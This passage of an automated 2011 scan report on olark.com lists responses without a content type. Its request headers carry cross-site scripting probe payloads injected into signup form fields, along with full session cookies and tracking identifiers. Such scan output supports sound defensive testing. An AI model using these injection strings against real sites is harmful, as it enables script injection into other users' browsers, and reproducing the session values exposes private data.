Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=; km_vs=1; km_lv=1307226306; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Sat, 04 Jun 2011 13:22:34 GMT
If-None-Match: "93005c-2bf75-4a4e2c35c1a80"-gzip
Cache-Control: max-age=0

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...
rn "static.olark.com/jsclient/loader1.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');/*]]>
...[SNIP]...

7. Content type is not specified  previous
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. http://www.olark.com/assets/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olark.com
Path:   /assets/common.js

Request

GET /assets/common.js?1307133378 HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=1307226384%20%2Fs%3FReferrer%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26_k%3D3225b0c50e306468d63651238f71383a01850728%26_p%3Dp6nVNyL3vgbPZf6fpECZXtkw1So%26_t%3D1307226384; km_vs=1; km_lv=1307226384; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Fri, 03 Jun 2011 20:36:18 GMT
If-None-Match: "57937f-102f8-4a4d4b4ab7480"-gzip

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...

7.2. http://www.olark.com/stylesheets/compiled/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olark.com
Path:   /stylesheets/compiled/print.css

Request

GET /stylesheets/compiled/print.css HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=; km_vs=1; km_lv=1307226306; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Fri, 03 Jun 2011 20:42:06 GMT
If-None-Match: "93005f-3cb-4a4d4c9698380"-gzip
Cache-Control: max-age=0

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...

7.3. http://www.olark.com/stylesheets/compiled/screen.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olark.com
Path:   /stylesheets/compiled/screen.css

Request

GET /stylesheets/compiled/screen.css HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=; km_vs=1; km_lv=1307226306; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Sat, 04 Jun 2011 13:22:34 GMT
If-None-Match: "93005c-2bf75-4a4e2c35c1a80"-gzip
Cache-Control: max-age=0

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...

Report generated by XSS.CX at Sat Jun 04 18:24:05 CDT 2011.